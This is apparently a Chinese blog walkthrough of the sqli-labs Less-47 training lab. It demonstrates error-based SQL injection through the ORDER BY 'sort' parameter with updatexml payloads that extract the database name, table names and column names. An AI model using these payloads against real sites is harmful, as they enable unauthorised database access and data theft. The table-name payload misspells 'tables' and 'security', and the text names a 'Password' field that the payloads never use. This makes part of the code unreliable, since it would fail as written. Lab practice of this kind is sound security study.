sqli-labs-Less-47

SQLI-LAPS 实验记录

Less-47

这一关与之前的关卡类似,只是闭合的方式不同。

首先我们在Password这一点输入Payload如下:

sql 复制代码
?sort=1

结果如图所示,页面以第一列为顺序,返回了数据库当中的数据。


之后,我们可以使用报错注入的方式,对数据库名、表名等内容进行注入。

php 复制代码
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

结果如图所示,返回了数据库名。

后续爆出数据库的表名、列名等方式如下:

  • 爆出表名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.talbes where table_schema='secutiry'),0x7e),1)--+
  • 爆出列名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
相关推荐
ss2736 小时前
食谱推荐系统功能测试如何写?
java·数据库·spring boot·功能测试
l1t6 小时前
DeepSeek总结的数据库外部表
数据库
m0_674294646 小时前
如何编写SQL存储过程性能对比_记录执行时间评估优化效果
jvm·数据库·python
014-code7 小时前
CompletableFuture 实战模板(超时、组合、异常链处理)
java·数据库
运气好好的7 小时前
怎样开启phpMyAdmin的操作审计日志_记录每条执行的SQL
jvm·数据库·python
それども7 小时前
DELETE 和 TRUNCATE TABLE区别
java·数据库·mysql
wenha7 小时前
数据库隔离级别
数据库·mysql·sqlserver·隔离级别
2401_871492858 小时前
Layui如何修改Layui默认的UI主题颜色(换肤功能实现)
jvm·数据库·python
Edward111111118 小时前
4.27mysql ,数据库,数据源
数据库·mysql
小徐敲java8 小时前
踩坑实录:MySQL8.0 导入SQL报错 2006 - MySQL server has gone away 完美解决
数据库·sql